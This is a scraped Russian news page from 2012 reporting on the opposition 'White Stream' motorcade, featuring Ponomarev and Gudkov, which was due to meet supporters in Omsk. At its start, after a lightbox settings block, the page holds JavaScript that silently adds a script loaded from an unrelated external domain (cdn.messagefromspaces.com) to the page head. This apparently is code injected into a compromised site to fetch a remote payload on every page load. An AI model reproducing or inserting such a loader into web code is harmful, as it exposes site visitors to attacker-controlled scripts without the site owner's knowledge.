, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 15 августа, 2018 года
3 сентября, 2012 Политика

Участники «Белого потока» встретятся с омскими сторонниками во «Флагмане»

Акция началась 25 августа в Красноярске. В понедельник, 27 августа, «Белый поток» побывал в Томске. Как сообщает ОмскПресс, пробег оппозиционных политиков не вызвал у томичей ажиотажа. Вместо заявленных 200 человек на встречу с Ильёй Пономарёвым пришло всего 30. Вчера, 29 августа, участники акции посетили Барнаул. По информации Сибинфо, алтайцев Пономарёв заинтересовал больше — к нему пришло уже порядка 70 человек. Сегодня «Белый поток» должен прибыть в Новосибирск, где к нему, возможно, присоединится Борис Немцов. А 30 августа Пономарёв и компания окажутся уже в Омске, откуда отправятся в Тюмень. Специально для встречи с омичами в компании однопартийца в Омск прилетит депутат Госдумы Геннадий Гудков. В 11.00 они проведут встречу со сторонниками, и после этого сразу же уедут.

Автопробег, в котором участвует несколько автомобилей, в том числе, «Лада Гранта» и Lexus, приурочен к старту выборов в Координационный совет оппозиции, которые пройдут 7 октября. В ходе выборов в Координационный совет оппозиции планируется привлечь региональных активистов.

«Я являюсь регионалом и считаю, что нам необходимо не замыкаться на протесте в Москве, а наращивать связи с гражданскими активистами в российских субъектах, – сообщил депутат Госдумы Пономарёв Сибинфо. — Я считаю, что эти выборы помогут нам всем определить вектор дальнейшей деятельности и в определенной мере являются в настоящий момент центральной точкой».

Интересно, что организацией встречи с депутатами Думы будет заниматься председатель регионального отделения РПР Игорь Басов, а вовсе не «Справедливая Россия», к которой относятся Пономарев и Гудков. Всвязи с этим, возможно, что прилетевший на встречу с новосибирцами Немцов, как сопередседатель Республиканской партии России, решит встретится с представителем партии в Омске лично.

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Политика